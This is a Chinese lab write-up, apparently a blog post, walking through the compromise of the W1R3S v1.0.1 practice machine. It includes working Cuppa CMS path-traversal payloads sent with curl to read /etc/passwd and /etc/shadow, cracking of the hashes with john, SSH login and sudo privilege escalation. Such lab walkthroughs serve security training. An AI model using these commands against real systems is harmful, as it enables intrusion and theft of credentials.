w1r3s.v1.0.1靶机

信息收集

1.查看靶机的mac地址并把网络连接模式改为nat

2.主机发现

3.端口扫描

4.访问它的80端口

5.没有发现什么有用信息,扫描目录

6.突然想到他开启的21端口匿名用户连接尝试,用户名密码都为Anonymous发现连接成功

7.将ftp上的所有txt文件都使用mget命令下载到kali上

8.查看所有下载下来的文件并没有发现什么有用的信息,拼接目录扫描的接口,发现/administrator和/wordpress/javascript进行拼接

9.发现没有什么太大的收获

getshell

1.突然在title处发现了cuppa cms这个信息,通过kali搜索

searchsploit cuppa

2.发现了一个远程文件包含漏洞将他下载下来

searchsploit cuppa cms -m 25971.txt

3.查看它

4.图中有一行是:

http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

url中的target应该就是靶机的ip,我们换为192.168.200.139试试,浏览器访问:http://192.168.42.188/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

5.发现路径不存在寻找其他路径

6.使用curl命令提交Post请求: , 成功得到目标主机的passwd文件内容

curl -X POST -d urlConfig=../../../../../../../../../etc/passwd http://192.168.42.188/administrator/alerts/alertConfigField.php

7.获取目标主机的shadow文件: 这里可以看到两处很明显的用户信息

curl -X POST -d urlConfig=../../../../../../../../../etc/shadow http://192.168.42.188/administrator/alerts/alertConfigField.php

8.将shadow文件内容复制到hash.txt中, 然后使用john命令进行破解:john hash.txt

9.远程连接

ssh w1r3s@192.168.42.188

提权

1.查看当前用户的权限:sudo -l

2.发现是all直接sudo su

3.成功提权

  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值